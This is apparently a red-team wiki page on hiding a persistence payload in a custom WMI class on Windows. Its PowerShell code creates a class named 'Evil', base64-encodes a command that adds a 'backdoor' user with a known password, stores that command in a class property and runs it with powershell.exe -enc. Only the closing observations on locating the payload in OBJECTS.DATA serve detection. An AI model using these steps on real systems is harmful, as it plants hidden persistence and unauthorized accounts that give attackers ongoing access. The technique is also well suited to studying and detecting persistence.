WMI as a Data Storage
Exploring WMI as a data storage for persistence by leveraging WMI classes and their properties.

Execution

Creating a new WMI class with a property EvilProperty that will later store the payload to be executed:
1
$evilClass = New-Object management.managementclass('root\cimv2',$null,$null)
2
$evilClass.Name = "Evil"
3
$evilClass.Properties.Add('EvilProperty','Tis notin good sir')
4
$evilClass.Put()
5
6
Path : \\.\root\cimv2:Evil
7
RelativePath : Evil
8
Server : .
9
NamespacePath : root\cimv2
10
ClassName : Evil
11
IsClass : True
12
IsInstance : False
13
IsSingleton : False
Copied!
We can see the Evil class properties:
1
([wmiclass] 'Evil').Properties
2
3
Name : EvilProperty
4
Value : Tis notin good sir
5
Type : String
6
IsLocal : True
7
IsArray : False
8
Origin : Evil
9
Qualifiers : {CIMTYPE}
Copied!
Checking WMI Explorer shows the new Evil class has been created under the root\cimv2 namepace - note the EvilProperty can also be observed:

Storing Payload

For storing the payload inside the EvilProperty, let's create a base64 encoded powershell command that adds a backdoor user with credentials backdoor:backdoor:
1
$command = "cmd '/c net user add backdoor backdoor /add'"
2
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
3
$encodedCommand = [Convert]::ToBase64String($bytes)
4
5
# $encodedCommand = YwBtAGQAIAAvAGMAIAAnAG4AZQB0ACAAdQBzAGUAcgAgAGIAYQBjAGsAZABvAG8AcgAgAGIAYQBjAGsAZABvAG8AcgAgAC8AYQBkAGQAJwA=
Copied!
Updating EvilProperty attribute to store $encodedCommand:
1
$evilClass.Properties.Add('EvilProperty', $encodedCommand)
Copied!
Below is the same as above, just in a screenshot:

Real Execution

1
powershell.exe -enc $evilClass.Properties['EvilProperty'].Value
Copied!
Executing the payload stored in the property of a WMI class's property - note that the backdoor user has been successfully added:
If we commit the $evilClass with its .Put() method, our payload will get stored permanently in the WMI Class. Note how a new "Evil" class' properties member shows the payload we have commited:

Observations

Using the WMI Explorer, we can inspect the class' definition which is stored in%SystemRoot%\System32\wbem\Repository\OBJECTS.DATA
The file contains all the classes and other relevant information about those classes. In our case, we can see the EvilProperty with our malicious payload inside:
When inspecting the OBJECTS.DATA with a hex editor, it is possible (although not very practical nor user friendly) to find the same data - note that the screenshot is referring to the state of the Evil class at the very beginning of its creation as this is when I took the screenshot:
Last modified 3yr ago